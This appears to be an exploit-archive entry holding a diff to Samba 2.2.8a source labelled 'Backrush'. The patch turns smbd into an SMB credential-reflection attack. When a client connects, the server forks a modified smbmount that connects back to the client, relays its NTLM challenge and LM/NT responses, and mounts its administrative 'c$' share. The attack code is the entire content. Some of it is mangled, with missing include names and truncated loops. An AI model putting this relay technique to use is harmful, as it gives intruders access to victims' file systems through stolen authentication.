760

SMB

diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430@@ -26,6 +26,10 @@#include #include #include +//>Backrush+int br_read[2], br_write[2], br_pid;+struct Backrush br_state;+//Backrush+ {+ int i;+ printf("challange: ");+ for (i = 0; i cryptkey[i]);+ fflush(stdout);+ memcpy(br_state.challenge, c->cryptkey, 8);+ br_state.status = 1;+ write(br_write[1],&br_state, sizeof(br_state));+ printf(" sent to server\n");+ printf("waiting for response...\n");+ fflush(stdout); + }+//Backrush+ printf("Started to mount %s on %s\n",argv[1], argv[2]);+ fflush(stdout);+ if (getenv("BACKRUSH_READ")) + br_read[0] = atoi(getenv("BACKRUSH_READ"));+ if (getenv("BACKRUSH_WRITE"))+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));+//Backrush+#include +#include +struct Backrush+{+ int status;+ char ip_address[20];+ int port;+ char username[256];+ char sharename[256];+ char netbios[256];+ char domain[256];+ char challenge[8];+ char nt_resp[24];+ char lm_resp[24];+};+extern struct Backrush br_state;+extern int br_read[2],br_write[2],br_pid;+//Backrush+ {+ int i;+ read(br_read[0],&br_state, sizeof(br_state));+ printf("received response:\n");+ fflush(stdout);+ memcpy(pword, br_state.lm_resp, 24);+ memcpy(ntpword, br_state.nt_resp, 24);+ if(br_state.username[0])+ strncpy(user, br_state.username, 24);+ printf("username: %s\n", user);+ printf("lm response: ");+ for (i = 0; i outbuf,'\0',smb_size);diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430@@ -180,6 +180,45 @@doencrypt = ((cli->sec_mode & 2) != 0);}+//>Backrush+ {+ srand(time(NULL));+ pipe(br_read);+ pipe(br_write);+ br_state.status = 1;+ br_state.port = random();+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));+ {+ char tmp[1024], *ptr;+ FILE *fin = fopen("backrush/ip2sharename.map","r");+ if (fin)+ {+ while(fscanf(fin, "%s", tmp) > 0)+ {+ ptr = strchr(tmp, ':');+ *ptr++ = 0;+ if (!strcmp(br_state.ip_address,tmp))+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));+ }+ fclose(fin);+ }+ }+ if (!(br_pid = fork()))+ {+ char cmd[1024];+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ _exit(0);+ }+ }+//Backrush+ read(br_read[0],&br_state, sizeof(br_state));+ memcpy(buf, br_state.challenge, 8);+//Backrush+ memcpy(br_state.nt_resp, nt_pass, 24);+ memcpy(br_state.lm_resp, lm_pass, 24);+ write(br_write[1],&br_state, sizeof(br_state));+// waitpid(br_pid,NULL,WNOHANG);+ return(False);+//Backrush + strncpy(br_state.username,user,sizeof(br_state.username));+ strncpy(user,"root",sizeof(br_state.username));+//+int am_parent = 1;
0